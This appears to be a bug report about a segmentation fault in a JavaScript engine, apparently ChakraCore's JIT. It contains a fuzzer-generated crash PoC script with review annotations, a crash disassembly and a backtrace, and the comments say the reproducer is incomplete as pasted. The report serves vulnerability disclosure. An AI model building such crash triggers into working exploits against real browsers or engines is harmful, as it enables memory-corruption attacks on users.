
Segmentation fault #6643

@bird8693

Description

@bird8693

environment

ubuntu 16

poc

// Entry point of the PoC. NOTE(review): `opt()` is not defined anywhere in
// this listing and `main()` is never invoked below, so the pasted reproducer
// appears to be incomplete — confirm against the original attachment.
function main() {
    var HWyR = 268435456 <= 9007199254740991; // unused local
    let arr = [
        1.1,
        2.2,
        3.3
    ]; // unused local (distinct from the global `arr` declared later)
    // Warm-up loop: 65536 calls to the (missing) opt(). Presumably intended to
    // get opt() compiled before the prototype change below — a frame named
    // LegalInstrFormsImpl::LEGAL_N_R_R appears in the reported backtrace.
    for (let i = 0; i < 65536; i++) {
        opt();
    }
    // Installs an accessor `x` on Array.prototype whose getter is
    // Object.prototype.valueOf, i.e. reading `someArray.x` returns the receiver.
    Array.prototype.__defineGetter__('x', Object.prototype.valueOf);
    var aKGJ = Symbol; // unused local
    print(opt());
}
// Top-level statement run of the PoC (fuzzer-generated: many redundant `var`
// redeclarations, unused bindings and dead loops). Every `var` below is
// hoisted to script scope, which matters for the loop conditions and
// comparisons that read `i` / `vars` before they are assigned.
var r = new Object();
var r = new Object(); // redeclaration; replaces r with a fresh empty object
// Hot loop: 100000 iterations of a trivial assignment.
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
    var nrYB = Symbol;
}
let arr = []; // unused (script-scope `arr`, unrelated to the `arr` inside main())
// `CollectGarbage` is bound to a plain object here and below; arithmetic on
// it (`% 1200`, `**`) therefore evaluates to NaN.
var CollectGarbage = new Object();
var r = new Object();
// `vars` is hoisted but not yet assigned here: `undefined >= {}` is false.
var Mchh = vars >= r;
var vars = [];
var r = new Object();
JSON.parse(null); // parses the string "null"; result discarded
once = CollectGarbage != 1.3; // `once` is never declared: implicit global
var ThnA = +9007199254740994;
var PHrh = -9007199254740991;
once = true;
var Jknd = Date;
var r = new Object();
var YQZc = +0.1;
var CollectGarbage = new Object();
// Dead loop: the condition reads the hoisted `i`, which is still undefined
// at this point (first assigned by the `for (var i = 20000; ...)` below), so
// `undefined < 20000` is false and the body never runs.
for (var Rjsi = new Uint32Array([1200]); i < 20000; i++) {
    vars[-1] = 'aaaaa';
}
var r = new Object();
r.lastIndex = 'aaaaa'; // plain data property on an empty object
once = CollectGarbage != 1.3;
r.lastIndex = 'aaaaa';
// The three `for (var i ...)` loops share the single hoisted `i`. The inner
// loops drive `i` to 40000 before the outer increment runs, so the outer
// body executes exactly once.
for (var i = 20000; i < 40000; i++) {
    vars[vars.length] = 'aaaaa';
    var xxKn = 3.141592653589793 * 1e-81;
    for (var i = 20000; i < 40000; i++) {
        vars[i] = ' \'\' ';
        var JfHf = CollectGarbage ** r + 1073741825; // NaN
        // From here on `vars` is the boolean `true`; later element writes on
        // it are silently dropped (sloppy mode) and `vars.length` is undefined.
        vars = !NaN;
        Array.prototype.length = 0;
    }
    for (var i = 20000; i < 40000; i++) {
        // 20000 x 100000 iterations of a trivial assignment — by far the
        // longest-running part of the script.
        for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
            var Jknd = Date;
        }
        once = Mchh.valueOf(); // Mchh is the boolean false (see above)
        var HWyR = 268435456 <= 9007199254740991;
        var dmdd = CollectGarbage % 1200; // NaN
        var dmdd = CollectGarbage % 1200;
        vars[-1] = 'aaaaa';
        var CollectGarbage = new Object();
        var SSsr = 2147483649 + -4294967297; // -2147483648, the int32 minimum
        var Rjsi = new Uint32Array([1200]);
        once = Mchh.valueOf();
        var cJjF = delete NaN; // false: the global NaN binding is non-configurable
        var nmMt = new Set([3.141592653589793]);
        var chhy = new RegExp(null); // pattern "null"
        var dmdd = CollectGarbage % 1200;
        var RjjJ = -1;
        once = CollectGarbage != 1.3;
        var winE = Promise;
    }
    var dmdd = CollectGarbage % 1200;
    vars[-1] = 'aaaaa';
    once = Mchh.valueOf();
    vars[vars.length] = 'aaaaa';
    var r = new Object();
    var nmMt = new Set([3.141592653589793]);
    var Mchh = vars >= r; // `true >= {}` -> false
}
var dmdd = CollectGarbage % 1200;
var sRcZ = Proxy;

output

command line output

Segmentation fault (core dumped)

crash point

   0x7ff7f2f932de                  push   0x48ca8b48
   0x7ff7f2f932e3                  shr    ecx, 0x30
   0x7ff7f2f932e6                  jne    0x7ff7f2f93cc9
 → 0x7ff7f2f932ec                  mov    rcx, QWORD PTR [rdx+0x8]
   0x7ff7f2f932f0                  xor    edi, edi
   0x7ff7f2f932f2                  cmp    rcx, QWORD PTR [r13+0x480]
   0x7ff7f2f932f9                  jne    0x7ff7f2f93ce5
   0x7ff7f2f932ff                  cmovne rdx, rdi
   0x7ff7f2f93303                  mov    rdi, QWORD PTR [r15+0x4d0dc]

callstack

gef➤ bt
#0 0x00007ff7f2f932ec in ?? ()
#1 0x0000555500000002 in ?? ()
#2 0x00007ff7f2f1f480 in ?? ()
#3 0x00005555573d9d20 in LegalInstrFormsImpl::LEGAL_N_R_R ()
#4 0x00007ffff695b53c in __GI___libc_free (mem=) at malloc.c:2968
#5 0x00007fffffffd220 in ?? ()
#6 0x00007ffff7fc37a8 in ?? ()
#7 0x0000000000000000 in ?? ()
